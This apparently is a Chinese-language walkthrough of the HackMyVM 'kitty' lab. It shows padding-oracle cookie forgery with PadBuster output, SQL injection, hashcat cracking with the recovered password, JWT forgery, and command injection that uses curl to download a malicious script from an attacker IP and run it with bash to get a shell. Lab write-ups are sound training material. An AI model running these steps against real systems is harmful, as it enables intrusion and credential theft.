hackmyvm: kitty walkthrough
hackmyvm: kitty walkthrough
0x01 oracle padding
端口扫描:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp gitea
使用curl访问80
端口, 被重定向到http://kitty.hmv
.
该网站为一个静态网站,通过ffuf
获取到了虚拟主机名 cookie.kitty.hmv
.
注册用户test
,查看cookie:
使用 oraclepadding.pl
破解该cookie。
➜ ~ ./oraclepadding.pl http://cookie.kitty.hmv/home/index.php OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG 8 -cookies "auth=OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG"+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***INFO: No error string was provided...starting response analysis*** Response Analysis Complete ***The following response signatures were returned:-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 302 8144 ../login.php
2 ** 255 302 0 ../logout.php?err=1
-------------------------------------------------------Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2Continuing test with selection 2[+] Success: (237/256) [Byte 8]
[+] Success: (41/256) [Byte 7]
[+] Success: (219/256) [Byte 6]
[+] Success: (75/256) [Byte 5]
[+] Success: (240/256) [Byte 4]
[+] Success: (143/256) [Byte 3]
[+] Success: (29/256) [Byte 2]
[+] Success: (188/256) [Byte 1]Block 1 Results:
[+] Cipher Text (HEX): 29751a62938de522
[+] Intermediate Bytes (HEX): 4ce47715b126d512
[+] Plain Text: user=tesUse of uninitialized value $plainTextBytes in concatenation (.) or string at ./oraclepadding.pl line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***[+] Success: (220/256) [Byte 8]
[+] Success: (32/256) [Byte 7]
[+] Success: (119/256) [Byte 6]
[+] Success: (112/256) [Byte 5]
[+] Success: (160/256) [Byte 4]
[+] Success: (229/256) [Byte 3]
[+] Success: (139/256) [Byte 2]
[+] Success: (171/256) [Byte 1] Block 2 Results:
[+] Cipher Text (HEX): 0d11b045b105c246
[+] Intermediate Bytes (HEX): 5d721d65948ae225
[+] Plain Text: t -------------------------------------------------------
** Finished *** [+] Decrypted value (ASCII): user=test [+] Decrypted value (HEX): 757365723D7465737407070707070707 [+] Decrypted value (Base64): dXNlcj10ZXN0BwcHBwcHBw== -------------------------------------------------------
将用户名改为 admin
,获取新的cookie.
0x02 sql injection
更新cookie后,刷新页面后,在页面中出现了 last_login.js
,在该js的接口中存在sql注入。
使用 sqlmap
, 获取到用户 gitea
’s 密码hash和salt.
| 357f47546ba3ab1cf633d3d0c54e2583 | gitea |
| salt | YXZpam5leWFt |
使用 hashcat
破解得到密码:
➜ ~ hashcat -m 10 -a 0 357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt /usr/share/wordlists/rockyou.txt --show
357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt:git0ffme
0x03 openapi to shell
使用账户gitea
登录host:3000
, 获取到了新的子域名: http://whythisapiissofast.kitty.hmv
.
访问 http://whythisapiissofast.kitty.hmv/openapi.json
,检查各个api。
- 访问 api
http://whythisapiissofast.kitty.hmv/api/v2/-1
,获取到用户nobody
。
- 访问 api
http://whythisapiissofast.kitty.hmv/api/v2/-2
,获取到一个私钥。
3. 使用nobody
获取access token,这是一个jwt。
4. 使用hashcat
破解jwt的password。
- 伪造token,将用户
nobody
改为admin
,is_admin
改为1,超时时间多加点。
6. 通过api /api/v2/secure/{command}
执行命令,但是这里存在一个过滤
7. 使用curl远程下载恶意sh,通过bash执行绕过过滤实现命令执行,成功获取shell。
这里需要将nginx的index改为test.sh。
(1) whythisapiissofast.kitty.hmv/api/v2/secure/curl%20-o%20test.sh%20192.168.85.169%20-wget
(2) whythisapiissofast.kitty.hmv/api/v2/secure/bash%20test.sh%20-wget
0x04 get user flag
home目录下存在两个用户。
利用步骤3找到的私钥通过ssh登录用户dyutidhara
,成功获取用户flag。
0x05 root提权
试了一些办法都失败了,有成功的小伙伴请在评论区告诉我一声,求帮助。
hackmyvm: kitty walkthrough相关推荐
- A Complete Machine Learning Walk-Through in Python
A Complete Machine Learning Project Walk-Through in Python: Part One A Complete Machine Learning Pro ...
- OPEN(SAP) UI5 学习入门系列之四:更好的入门系列-官方Walkthrough
好久没有更新了,实在不知道应该写一些什么内容,因为作为入门系列,实际上应该更多的是操作而不是理论,而在UI5 SDK中的EXPLORER里面有着各种控件的用法,所以在这里也没有必要再来一遍,还是看官方 ...
- exif viewer java,1earn/XSS挑战-WalkThrough.md at master · dizhaung/1earn · GitHub
XSS挑战-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 知识点 无过滤 XSS (level 1) 各种难度 ...
- linux超级好用检索跳转工具hg:hyperlinked_grep (grep+kitty)
1,安装命令: install kitty: curl -L https://sw.kovidgoyal.net/kitty/installer.sh | sh /dev/stdin install ...
- 以太坊加密猫Crypto Kitty合约解析
以太坊加密猫Crypto Kitty合约源码深度解析 1. 加密猫核心合约概述 Crypto Kitty 核心业务合约总共有四个:KittyAdmin.KittyContract.KittyFacto ...
- Walkthrough: Word 2007 XML 格式
本页内容 简介 Word 2007 文档包 Word XML格式的开放打包约定 解析Word 2007文件 确定Word 2007文档中的非XML部件 从文档中分离内容 理解数据存储 结论 简介 Mi ...
- kitty猫的基因编码
kitty猫的基因编码 Time Limit:1s Memory Limit:1000k Total Submit:4105 Accepted:1529 Problem kitty的基因编码如下定义: ...
- hackmyvm-bunny walkthrough
hackmyvm-buny walkthrough 难度(作者评价):difficult 信息收集 PORT STATE SERVICE 22/tcp open ssh 80/tcp open htt ...
- Kitty: 又一款基于 GPU 加速的终端工具
公众号关注 「奇妙的 Linux 世界」 设为「星标」,每天带你玩转 Linux ! 基于 GPU 的功能强大的终端仿真器(跨平台是王道) 近几年越来越多人喜欢使用 dotfiles 中进行追踪自己的 ...
最新文章
- 年轻人不讲武德,居然在简历中藏木马!
- win7输入密码界面背景怎么更改
- 让shell脚本开机自启动方法
- 网页版电脑桌面远程操控_我真的再也不买电暖器了 - 电暖器智能版
- Mycat分布式数据库架构解决方案--搭建MySQL读写分离环境--一主多从
- 玩客云刷Armbian5.9.0安装青龙提示“面版解决服务异常,请手动执行ql check检查服务状态”
- 图像语义分割(13)-OCNet: 用于场景解析的目标语义网络
- c#中嵌入echarts_如何利用 C# + Echarts 绘制 Bar Simple
- 一二线城市知名 IT 互联网公司名单,程序员选择多了
- 又是一次数据分析的例子(自杀分析)
- 远程计算机怎么桌面显示不全,桌面显示不全怎么设置
- oracle rac 各日志,oracle rac 日志体系结构!
- 从ghost映像.gho文件快速创建vmware虚拟机
- 搜狗泛站怎么做?搜狗泛域名泛目录收录方法
- VR AR应用开发交流大会在天津成功举办 京津VR AR企业交流心得共促合作
- 卡尔曼滤波简介(转载)
- 走出误区,老杨命运发生了转折
- 利用SQL语句创建、修改、删除、查看与使用数据库
- eclipse java 马士兵 百度云,java马士兵,java马士兵百度云资源_盘多多如风搜_盘搜搜_哎哟喂啊...
- http/https接口调用
热门文章
- git 报错:remote: HTTP Basic: Access denied
- OA系统工作台集成云星空轻分析功能
- 无线路由器中WMM/Short GI/AP隔离各是什么功能, 开启时PC无法ping通手机.
- Linux_网络_传输层协议 TCP通信滑动窗口(快重传),流量控制,拥塞控制(慢启动),延迟应答,捎带应答,TCP常见问题(字节流,粘包),Listen半连接队列
- 汽车电子(三)--- 车机TBOX 介绍
- [附源码]java+ssm计算机毕业设计红色旅游信息项目管理58lsu(源码+程序+数据库+部署)
- 数据分析工具--matplotlib
- 粤嵌培训如何?优质教学让你就业不愁
- 双键的Map,Table的rowKey+columnKey+value方法简单应用
- HLA-A单克隆抗体实验研究方案